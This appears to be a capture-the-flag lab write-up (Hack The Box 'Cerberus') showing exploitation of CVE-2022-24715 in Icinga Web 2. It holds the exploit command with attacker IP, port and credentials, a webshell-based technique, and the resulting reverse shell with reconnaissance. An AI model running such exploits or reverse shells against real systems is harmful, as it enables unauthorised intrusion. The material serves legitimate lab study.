Remote Code Execution

The target Icinga Web 2 instance has additionally been identified to be vulnerable to [[Cerberus_CVE-2022-24715#[CVE-2022-24715](https //nvd.nist.gov/vuln/detail/CVE-2022-24715)|CVE-2022-24715]], a RCE vulnerability

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ python3 CVE-2022-24715.py --help                                                                                                                          
usage: CVE-2022-24715.py [-h] -t TARGET -I ATK_IP -P ATK_PORT -u USERNAME -p PASSWORD -e PEM [-x PROXY]
 
Authenticated Remote Code Execution in Icinga Web <2.8.6, <2.9.6, <2.10
 
options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target icinga location (example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)
  -I ATK_IP, --atk-ip ATK_IP
                        Address for reverse shell listener on attacking machine
  -P ATK_PORT, --atk-port ATK_PORT
                        Port for reverse shell listener on attacking machine
  -u USERNAME, --username USERNAME
                        Username of administrator user on Icinga Web 2
  -p PASSWORD, --password PASSWORD
                        Password of administrator user on Icinga Web 2
  -e PEM, --pem PEM     Location of file on attacking machine containing valid PEM (Generate with "ssh-keygen -m pem" without passphrase)
  -x PROXY, --proxy PROXY
                        http proxy address (example: http://127.0.0.1:8080/)

The exploit script works by

uploading a malicious SSH resource with a crafted name
writing a PHP webshell to a writable location using the SSH private key field
- the webshell is then triggered by modifying certain application configurations, enabling a custom module, and then executing a command on the target system.

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ ssh-keygen -m pem                                                   
Generating public/private rsa key pair.
enter file in which to save the key (/home/kali/.ssh/id_rsa): /home/kali/archive/htb/labs/cerberus/id_rsa
enter passphrase (empty for no passphrase): 
enter same passphrase again: 
Your identification has been saved in /home/kali/archive/htb/labs/cerberus/id_rsa
Your public key has been saved in /home/kali/archive/htb/labs/cerberus/id_rsa.pub
the key fingerprint is:
sha256:wblK7lIqdbY2txtlncAbu3vzg735m1tHrdmi3BOWDm0 kali@kali
the key's randomart image is:
+---[RSA 3072]----+
|                 |
|       . o       |
|        + +      |
|         o * .  .|
|      . S = o. .o|
|    .o+. o .. E= |
|   . =o.. .  B+.+|
|  . o.+ .. o+o=o+|
|   . o.ooo..oo=O+|
+----[SHA256]-----+

Generating a PEM key pair

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ python3 cve-2022-24715.py -t 'http://icinga.cerberus.local:8080/icingaweb2' -I 10.10.14.4 -P 9999 -u matthew -p 'IcingaWebPassword2023' -e ./id_rsa    
[INFO] Attempting to login to the Icinga Web 2 instance...
[INFO] Attempting to upload our malicious module...
[SUCCESS] The payload appears to be uploaded successfully!
[INFO] Modifying configurations...
[INFO] Attempting to enable the malicious module...
[INFO] Trying to trigger payload! Have a listener ready!
[SUCCESS] It appears that a reverse shell was started!
[INFO] Removing malicious module file...
[INFO] Disabling malicious module...
[INFO] Resetting website configuration...
[SUCCESS] Cleanup successful! Shutting down...
[ALERT] In the process of exploitation, the application logging has been turned off. Log in manually to reset these settings!

Executing

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ nnc 9999                   
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.205] 49884
bash: cannot set terminal process group (625): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icinga:/usr/share/icingaweb2/public$ whoami
whoami
www-data
www-data@icinga:/usr/share/icingaweb2/public$ hostname
hostname
icinga
www-data@icinga:/usr/share/icingaweb2/public$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.22.2  netmask 255.255.255.240  broadcast 172.16.22.15
        inet6 fe80::215:5dff:fe5f:e801  prefixlen 64  scopeid 0x20<link>
        ether 00:15:5d:5f:e8:01  txqueuelen 1000  (Ethernet)
        RX packets 236319  bytes 31936551 (31.9 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 304334  bytes 49433800 (49.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 15644  bytes 1197456 (1.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15644  bytes 1197456 (1.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial Foothold established to the container environment, 172.16.22.2, as the www-data account via exploiting CVE-2022-24715

InfoSec LAB

Explorer

Cerberus_Icinga_RCE

Remote Code Execution

Interactive Graph View

Backlinks